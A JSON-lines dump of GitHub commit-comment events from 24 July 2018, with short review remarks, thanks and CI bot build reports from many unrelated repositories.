{"id":"8011948761","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29818116,"position":null,"line":null,"path":null,"commit_id":"4bd8f020adaaae8277f1089cd9cdf5895637272e","created_at":"2018-07-24T18:24:00Z","updated_at":"2018-07-24T18:24:00Z","author_association":"CONTRIBUTOR","body":"Of course not "}},"created_at":"2018-07-24T18:24:00Z"}
{"id":"8011977622","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29818182,"position":8,"line":8,"path":"1/quadratic_equation.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T18:29:29Z","updated_at":"2018-07-24T18:29:29Z","author_association":"OWNER","body":"хорошо"}},"created_at":"2018-07-24T18:29:29Z"}
{"id":"8011979958","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29818186,"position":10,"line":10,"path":"1/quadratic_equation.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T18:29:55Z","updated_at":"2018-07-24T18:29:55Z","author_association":"OWNER","body":"хорошо\r\n"}},"created_at":"2018-07-24T18:29:55Z"}
{"id":"8011980323","type":"CommitCommentEvent","actor":{"login":"MythicManiac"},"repo":{"name":"LeagueSandbox/GameServer"},"payload":{"comment":{"id":29818187,"position":6,"line":51,"path":"GameServerApp/Settings/GameInfo.json.template","commit_id":"f6f5a79973253ba6b74b2ee0fd697627af8e6923","created_at":"2018-07-24T18:29:59Z","updated_at":"2018-07-24T18:29:59Z","author_association":"MEMBER","body":"On second thought, the client location should not even be included in the server config since the client and server should not have anything to do with each other."}},"created_at":"2018-07-24T18:29:59Z"}
{"id":"8011983603","type":"CommitCommentEvent","actor":{"login":"jacefarm"},"repo":{"name":"yowainwright/developer-ci-benefits"},"payload":{"comment":{"id":29818194,"position":null,"line":null,"path":null,"commit_id":"96bc9e43963d5cb0f0bc2a0019eb6e220b8e71e1","created_at":"2018-07-24T18:30:36Z","updated_at":"2018-07-24T18:30:36Z","author_association":"NONE","body":"Great effort, nice work @yowainwright 👏 "}},"created_at":"2018-07-24T18:30:36Z"}
{"id":"8011983678","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29818195,"position":14,"line":14,"path":"1/quadratic_equation.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T18:30:37Z","updated_at":"2018-07-24T18:30:37Z","author_association":"OWNER","body":"хорошо"}},"created_at":"2018-07-24T18:30:37Z"}
{"id":"8011984767","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29818197,"position":17,"line":17,"path":"1/quadratic_equation.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T18:30:50Z","updated_at":"2018-07-24T18:30:50Z","author_association":"OWNER","body":"ок"}},"created_at":"2018-07-24T18:30:50Z"}
{"id":"8011984926","type":"CommitCommentEvent","actor":{"login":"LinnoBraz"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29818199,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T18:30:51Z","updated_at":"2018-07-24T18:30:51Z","author_association":"NONE","body":"Nice Project\n\n2018-07-24 13:37 GMT-03:00 luckyruby1006 <notifications@github.com>:\n\n> nice\n>\n>\n> On Tue, Jul 24, 2018 at 9:32 AM, abdull2bk <notifications@github.com>\n> wrote:\n>\n> > nice project\n> >\n> > —\n> > You are receiving this because you are subscribed to this thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/iride2020/iRide-Token/commit/\n> 8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29816830>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> Anq0mvQQlwYj4Ig42ORBT1iQQjUfEbTTks5uJ0wvgaJpZM4VaEAl>\n> > .\n>\n> >\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29816882>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnrUO_4ivmqBrvyU6VV_lm13Cs4Y-44tks5uJ01GgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-24T18:30:51Z"}
{"id":"8011988998","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29818209,"position":9,"line":9,"path":"1/right_triangle.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T18:31:39Z","updated_at":"2018-07-24T18:31:39Z","author_association":"OWNER","body":"там так и есть, просто это в начале"}},"created_at":"2018-07-24T18:31:39Z"}
{"id":"8011990200","type":"CommitCommentEvent","actor":{"login":"sisou"},"repo":{"name":"nimiq-network/core"},"payload":{"comment":{"id":29818211,"position":5,"line":72,"path":"src/main/generic/network/message/TransactionReceiptsMessage.js","commit_id":"ab1cbc64c75ac8a50ccc6d83d7267e60a3da1047","created_at":"2018-07-24T18:31:53Z","updated_at":"2018-07-24T18:31:53Z","author_association":"COLLABORATOR","body":"This won't work, as the message itself validates that the count of receipts included in it does not exceed this limit. Thus if you return 250 sends and 250 receives, the message creation will fail. "}},"created_at":"2018-07-24T18:31:53Z"}
{"id":"8011991287","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29818212,"position":11,"line":11,"path":"1/right_triangle.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T18:32:06Z","updated_at":"2018-07-24T18:32:06Z","author_association":"OWNER","body":"ок"}},"created_at":"2018-07-24T18:32:06Z"}
{"id":"8011994989","type":"CommitCommentEvent","actor":{"login":"sisou"},"repo":{"name":"nimiq-network/core"},"payload":{"comment":{"id":29818222,"position":7,"line":344,"path":"clients/nodejs/modules/JsonRpcServer.js","commit_id":"ab1cbc64c75ac8a50ccc6d83d7267e60a3da1047","created_at":"2018-07-24T18:32:48Z","updated_at":"2018-07-24T18:32:48Z","author_association":"COLLABORATOR","body":"Better devide the limit of 500 by two here. "}},"created_at":"2018-07-24T18:32:48Z"}
{"id":"8011997027","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29818226,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-24T18:33:12Z","updated_at":"2018-07-24T18:33:12Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-24T18:33:12Z"}
{"id":"8011998035","type":"CommitCommentEvent","actor":{"login":"mukimahmed"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29818228,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T18:33:23Z","updated_at":"2018-07-24T18:33:23Z","author_association":"NONE","body":"Very nice project and good team."}},"created_at":"2018-07-24T18:33:23Z"}
{"id":"8011999689","type":"CommitCommentEvent","actor":{"login":"ketaj271969"},"repo":{"name":"ketaj271969/codehacking"},"payload":{"comment":{"id":29818233,"position":null,"line":null,"path":null,"commit_id":"cfcb857fcc0a674c06a9f67dbf521cc580c396cd","created_at":"2018-07-24T18:33:41Z","updated_at":"2018-07-24T18:33:41Z","author_association":"OWNER","body":"https://github.com/ketaj271969/codehacking/commit/cfcb857fcc0a674c06a9f67dbf521cc580c396cd#diff-2e1a93a8a115a9144896d8680efb04d8\r\nhttps://github.com/ketaj271969/codehacking/commit/cfcb857fcc0a674c06a9f67dbf521cc580c396cd#diff-b67bf4d835f497db15dd3b652689b94d"}},"created_at":"2018-07-24T18:33:41Z"}
{"id":"8012000409","type":"CommitCommentEvent","actor":{"login":"sravani18"},"repo":{"name":"sravani18/hello-world"},"payload":{"comment":{"id":29818237,"position":null,"line":null,"path":null,"commit_id":"c57da15e13902097cdedd0f16f8e0f8f0bdf534a","created_at":"2018-07-24T18:33:48Z","updated_at":"2018-07-24T18:33:48Z","author_association":"OWNER","body":"new changes"}},"created_at":"2018-07-24T18:33:48Z"}
{"id":"8012003703","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29818244,"position":null,"line":null,"path":null,"commit_id":"78ee349c92abd7a58a3674aec78053899c038cc0","created_at":"2018-07-24T18:34:26Z","updated_at":"2018-07-24T18:34:26Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-366](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-366).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-366-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T18:34:26Z"}
{"id":"8012004479","type":"CommitCommentEvent","actor":{"login":"hiteshkumardasika"},"repo":{"name":"vaddipar/fbSpam"},"payload":{"comment":{"id":29818248,"position":32,"line":32,"path":"src/main/java/com/vaddipar/fbspam/utilities/FacebookHelper.java","commit_id":"9d89ac7a76855db5cb90e9a77024bdec9af05d7d","created_at":"2018-07-24T18:34:34Z","updated_at":"2018-07-24T18:34:34Z","author_association":"NONE","body":"No problem!. Will keep an eye on your commits as well :-D"}},"created_at":"2018-07-24T18:34:34Z"}
{"id":"8012011632","type":"CommitCommentEvent","actor":{"login":"reshmaraphael"},"repo":{"name":"reshmaraphael/sampleOne"},"payload":{"comment":{"id":29818256,"position":null,"line":null,"path":null,"commit_id":"0342c2e501b4a5e14ac67c6089d25ee6a40f33ac","created_at":"2018-07-24T18:35:50Z","updated_at":"2018-07-24T18:35:50Z","author_association":"OWNER","body":"good idea"}},"created_at":"2018-07-24T18:35:50Z"}
{"id":"8012013277","type":"CommitCommentEvent","actor":{"login":"yycunc"},"repo":{"name":"yycunc/SAFEclustering"},"payload":{"comment":{"id":29818260,"position":null,"line":null,"path":null,"commit_id":"ae8419c664448666b2a0cc0b7a9586eb641e94c9","created_at":"2018-07-24T18:36:07Z","updated_at":"2018-07-24T18:36:07Z","author_association":"OWNER","body":"In this folder, shmetis program is required by HGPA partitioning when running on Mac platform (from the hMETIS package v. 1.5 (Karypis et al., IEEE Transactions on Very Large Scale Integration (VLSI) Systems, 1999)), and gpmetis program is required by MCLA and CSPA partitioning (from METIS v. 5.1.0 (Karypis and Kumar, SIAM Journal on Scientific Computing, 1998)). Please put them in the working directory or provide the directory where these two programs are."}},"created_at":"2018-07-24T18:36:07Z"}
{"id":"8012017045","type":"CommitCommentEvent","actor":{"login":"cereallarceny"},"repo":{"name":"cereallarceny/cra-ssr"},"payload":{"comment":{"id":29818263,"position":35,"line":35,"path":"package.json","commit_id":"cfc8d8f6fba59fbdc475d5622d52ad0dc9a50a07","created_at":"2018-07-24T18:36:49Z","updated_at":"2018-07-24T18:36:49Z","author_association":"OWNER","body":"Yep @Maxwell2022 - feel free to submit a PR."}},"created_at":"2018-07-24T18:36:49Z"}
{"id":"8012024771","type":"CommitCommentEvent","actor":{"login":"samk7851"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29818276,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T18:38:15Z","updated_at":"2018-07-24T18:38:15Z","author_association":"NONE","body":"Nice job.."}},"created_at":"2018-07-24T18:38:15Z"}
{"id":"8012024846","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29818277,"position":null,"line":null,"path":null,"commit_id":"e01e4b41c1c48cb6c086913e6c4bd5b0d3c47e63","created_at":"2018-07-24T18:38:15Z","updated_at":"2018-07-24T18:38:15Z","author_association":"MEMBER","body":"It's a Python IDE based around IPython. People may want to use a 2 or 3 version. While IPython supports multiple kernels, we don't provide any tools for that so it may be best to keep it in here. It's one of these cases where it's not so clear."}},"created_at":"2018-07-24T18:38:15Z"}
{"id":"8012028419","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29818284,"position":null,"line":null,"path":null,"commit_id":"aa2e997b3d72018e95fa8355e30e94298593b6c7","created_at":"2018-07-24T18:38:56Z","updated_at":"2018-07-24T18:38:56Z","author_association":"NONE","body":"issue_#6601_1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2325 of 2325 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-24T18:38:56Z"}
{"id":"8012038380","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29818304,"position":null,"line":null,"path":null,"commit_id":"aa2e997b3d72018e95fa8355e30e94298593b6c7","created_at":"2018-07-24T18:40:42Z","updated_at":"2018-07-24T18:40:42Z","author_association":"NONE","body":"issue_#6601_1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T18:40:42Z"}
{"id":"8012038839","type":"CommitCommentEvent","actor":{"login":"ashkerhredoy"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29818305,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-24T18:40:47Z","updated_at":"2018-07-24T18:40:47Z","author_association":"NONE","body":"https://novoresume.com/editor/resume/3c1cba10-8f63-11e8-a8be-a5092628615f#/new-member-joined\r\n"}},"created_at":"2018-07-24T18:40:47Z"}
{"id":"8012044824","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29818316,"position":null,"line":null,"path":null,"commit_id":"48e8d01828a8c121c08e29646cf150485f2b49cf","created_at":"2018-07-24T18:41:51Z","updated_at":"2018-07-24T18:41:51Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-367](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-367).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-367-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T18:41:51Z"}
{"id":"8012046777","type":"CommitCommentEvent","actor":{"login":"anjalijain1998"},"repo":{"name":"anjalijain1998/itsme"},"payload":{"comment":{"id":29818320,"position":null,"line":null,"path":null,"commit_id":"855052c765ced6a96850c279d645cbfc967dbd31","created_at":"2018-07-24T18:42:08Z","updated_at":"2018-07-24T18:42:08Z","author_association":"OWNER","body":"Hey everyone,\r\nI have completed my first project that is \"My Tribute Page\". I will appreciate you guys for your responsive feedbacks.  \r\nLink:  https://codepen.io/anjalijain1998/pen/WKjrbR?editors=1100\r\nThanks in advance"}},"created_at":"2018-07-24T18:42:08Z"}
{"id":"8012047948","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29818322,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-24T18:42:21Z","updated_at":"2018-07-24T18:42:21Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-24T18:42:21Z"}
{"id":"8012054752","type":"CommitCommentEvent","actor":{"login":"HunterKing"},"repo":{"name":"HunterKing/NSWDBot"},"payload":{"comment":{"id":29818332,"position":null,"line":null,"path":null,"commit_id":"4cb29371e9c0fb8a86b7632c2f82472c99545fe1","created_at":"2018-07-24T18:43:34Z","updated_at":"2018-07-24T18:43:34Z","author_association":"OWNER","body":"If you think this is a poor implementation, you can re-open your PR and explain yourself rather than leave drive-by insults. I elaborated on why yours doesn't work, and told you that I don't understand what embeds even are in the context of discord. I don't have much experience with python or even in general, and I'm welcome to suggestions but being outright rude doesn't leave a great impression."}},"created_at":"2018-07-24T18:43:34Z"}
{"id":"8012067028","type":"CommitCommentEvent","actor":{"login":"vika2222"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29818358,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T18:45:47Z","updated_at":"2018-07-24T18:45:47Z","author_association":"NONE","body":"I think this is very good Project and Best team"}},"created_at":"2018-07-24T18:45:47Z"}
{"id":"8012068830","type":"CommitCommentEvent","actor":{"login":"LimaRumana"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29818361,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-24T18:46:09Z","updated_at":"2018-07-24T18:46:09Z","author_association":"NONE","body":"https://novoresume.com/editor/resume/d834fce0-8f5a-11e8-9868-5dd31a4e7bb2"}},"created_at":"2018-07-24T18:46:09Z"}
{"id":"8012069169","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29818362,"position":null,"line":null,"path":null,"commit_id":"110bc799d02120a5cfd8a3a8ef5d2cb0a9160683","created_at":"2018-07-24T18:46:13Z","updated_at":"2018-07-24T18:46:13Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-55](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-55).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-55-msgu.pantheonsite.io/)"}},"created_at":"2018-07-24T18:46:13Z"}
{"id":"8012069555","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29818363,"position":null,"line":null,"path":null,"commit_id":"b706fcb5c2de8f8c89152946892b97807b33ac42","created_at":"2018-07-24T18:46:17Z","updated_at":"2018-07-24T18:46:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-themi](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-themi).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-themi-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T18:46:17Z"}
{"id":"8012072566","type":"CommitCommentEvent","actor":{"login":"jamiehankins"},"repo":{"name":"javiertelioz/angular2-csv"},"payload":{"comment":{"id":29818370,"position":null,"line":null,"path":null,"commit_id":"01e31ada84d6bd240e6df4581a31b8147f02d3b0","created_at":"2018-07-24T18:46:50Z","updated_at":"2018-07-24T18:46:50Z","author_association":"NONE","body":"I'm guessing this is why I'm getting this now:\r\n`dest/ceventlog/CEventLog.ts(4,9): error TS2305: Module '\"C:/git/GF_Boot/client/libraries/gf-lib-common/node_modules/angular2-csv/angular2-csv\"' has no exported member 'Angular2Csv'.`"}},"created_at":"2018-07-24T18:46:50Z"}
{"id":"8012080150","type":"CommitCommentEvent","actor":{"login":"MinatsuT"},"repo":{"name":"MinatsuT/PSoC5_USB_Keyboard"},"payload":{"comment":{"id":29818379,"position":null,"line":null,"path":null,"commit_id":"b858528e7adf5951f246221cba2e3d8b4be47625","created_at":"2018-07-24T18:48:17Z","updated_at":"2018-07-24T18:48:17Z","author_association":"OWNER","body":"シリアルの入力にKitProgのUSB-シリアルブリッジ機能を使用しているため、TeraTermを起動するほうのPCにKitProg側のUSBを接続して頂くと、入力できるかと思います。\r\n\r\nなお、P12(6)とP12(7)はPSoC5 Prototyping Kitの基板上でKitProg側と接続済みなので、もし、KitProgではないUSB-シリアル変換器を使用される場合は、別のピンにアサインして下さい。また、このデザイン(TopDesign.cysch)で使用しているUARTモジュールは、8MHzのクロックを入力してこれを８倍オーバーサンプリングして1MBpsの速度に設定しているため、115,200bpsで使われる場合は8MHzのクロックを外して、UARTモジュールをダブルクリックすると出る設定画面の「Advanced」タブで、Internal Clockに変更していただいたほうがよいかと思います。"}},"created_at":"2018-07-24T18:48:17Z"}
{"id":"8012084172","type":"CommitCommentEvent","actor":{"login":"fbrosson"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29818389,"position":10,"line":10,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-24T18:49:02Z","updated_at":"2018-07-24T18:49:02Z","author_association":"MEMBER","body":"FWIW, LibreOffice downloads several other tarballs at build time, probably something between 5 and 15 tarballs."}},"created_at":"2018-07-24T18:49:02Z"}
{"id":"8012087601","type":"CommitCommentEvent","actor":{"login":"cdenneen"},"repo":{"name":"kubernetes/heapster"},"payload":{"comment":{"id":29818397,"position":null,"line":null,"path":null,"commit_id":"9b40bc0fc77e2b347a79670efe7a5a90e846db08","created_at":"2018-07-24T18:49:39Z","updated_at":"2018-07-24T18:49:39Z","author_association":"NONE","body":"Documentation for EKS pointing at this page document which is now broken due to the beta image not being publicly available.\r\n\r\nk8s.gcr.io/heapster-amd64:v1.6.0-beta.1\r\n\r\nHad to manually switch back to 1.5.3"}},"created_at":"2018-07-24T18:49:39Z"}
{"id":"8012087768","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29818398,"position":null,"line":null,"path":null,"commit_id":"8ae1948c3dd2fdfe0f42b05c96eaafc0decff07e","created_at":"2018-07-24T18:49:41Z","updated_at":"2018-07-24T18:49:41Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-369](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-369).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-369-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T18:49:41Z"}
{"id":"8012090901","type":"CommitCommentEvent","actor":{"login":"wenkokke"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29818407,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T18:50:16Z","updated_at":"2018-07-24T18:50:16Z","author_association":"NONE","body":"Having Nat-computed levels makes it impossible to use huge portions of the standard library while using your own version of natural numbers. I'd suggest putting this code elsewhere in the standard library, say in `Level.FromNat`."}},"created_at":"2018-07-24T18:50:16Z"}
{"id":"8012099203","type":"CommitCommentEvent","actor":{"login":"rusmonster"},"repo":{"name":"bitstadium/HockeySDK-Android"},"payload":{"comment":{"id":29818427,"position":5,"line":8,"path":"hockeysdk/src/main/AndroidManifest.xml","commit_id":"8d24cc936fb5338d2c8d24f1e980bcd40a30b887","created_at":"2018-07-24T18:51:48Z","updated_at":"2018-07-24T18:51:48Z","author_association":"NONE","body":"It's not clear for me why do you need this `android:maxSdkVersion=\"18\"` attribute. But if you really need it - I think much better way remove the permission from your manifest and add runtime check for the permission and throw RuntimeException(\"With human readable explanation. For more see: http://link-to-release-notes.html\") if no permission. Also add to release notes info about this permission requirement, but still not so many people will find it there. But all of them will see the crash and fix it in 5 minutes."}},"created_at":"2018-07-24T18:51:48Z"}
{"id":"8012101405","type":"CommitCommentEvent","actor":{"login":"getnamo"},"repo":{"name":"getnamo/ZipUtility-ue4"},"payload":{"comment":{"id":29818430,"position":null,"line":null,"path":null,"commit_id":"5d9e30e028d80c2bb702e5611dd0bf8c3d04ab92","created_at":"2018-07-24T18:52:12Z","updated_at":"2018-07-24T18:52:12Z","author_association":"OWNER","body":"This is a problem with VS 2017, they're kind of encouraging people to get off of ats. That said your fix is exactly the kind of patch we need. Please make a pull request and I'll merge it."}},"created_at":"2018-07-24T18:52:12Z"}
{"id":"8012102136","type":"CommitCommentEvent","actor":{"login":"sbm2391"},"repo":{"name":"mikempala/mars-rover-kata"},"payload":{"comment":{"id":29818432,"position":null,"line":null,"path":null,"commit_id":"f505231d77f60d8e4fe41ae58234a8f13fb62433","created_at":"2018-07-24T18:52:20Z","updated_at":"2018-07-24T18:52:20Z","author_association":"NONE","body":"!Muy bien logrado!  Solo te faltó poner en el readme o index como utilizarlo (llamar la función executeCommands() que recibe una array... )"}},"created_at":"2018-07-24T18:52:20Z"}
{"id":"8012103742","type":"CommitCommentEvent","actor":{"login":"diversys"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29818437,"position":10,"line":10,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-24T18:52:39Z","updated_at":"2018-07-24T18:52:39Z","author_association":"MEMBER","body":"Most of them are fonts."}},"created_at":"2018-07-24T18:52:39Z"}
{"id":"8012107858","type":"CommitCommentEvent","actor":{"login":"drewish"},"repo":{"name":"recurly/recurly-client-ruby"},"payload":{"comment":{"id":29818447,"position":5,"line":39,"path":"lib/recurly/schema/schema_validator.rb","commit_id":"bfbc74ef078320e26e899d06ac8ccd2ea1efd6f8","created_at":"2018-07-24T18:53:27Z","updated_at":"2018-07-24T18:53:27Z","author_association":"MEMBER","body":"Applying DeMorgan's here to make it a bit more readable."}},"created_at":"2018-07-24T18:53:27Z"}
{"id":"8012109604","type":"CommitCommentEvent","actor":{"login":"evil-at-wow"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29818451,"position":null,"line":null,"path":null,"commit_id":"106915097925b9527069bd659dd340cdfc9b3d76","created_at":"2018-07-24T18:53:47Z","updated_at":"2018-07-24T18:53:47Z","author_association":"CONTRIBUTOR","body":"@lduguid Thanks for that info. I didn't know it was updated in MySQL (my old machine had MySQL 5.5 so that's what I remember, and my current workstation has MariaDB).\r\n\r\nYour comment made me check the MariaDB documentation to verify its defaults as well, and that brought up something interesting:\r\n\r\n```\r\n16777216 (16M) >= MariaDB 10.2.4\r\n4194304 (4M) >= MariaDB 10.1.7\r\n1048576 (1MB) <= MariaDB 10.1.6 \r\n```\r\n\r\nThis is interesting in particular because I have a recent 10.1 release on my workstation, so I should have 4M by default... time to go double check my configuration rather than make noise here! :smile: "}},"created_at":"2018-07-24T18:53:47Z"}
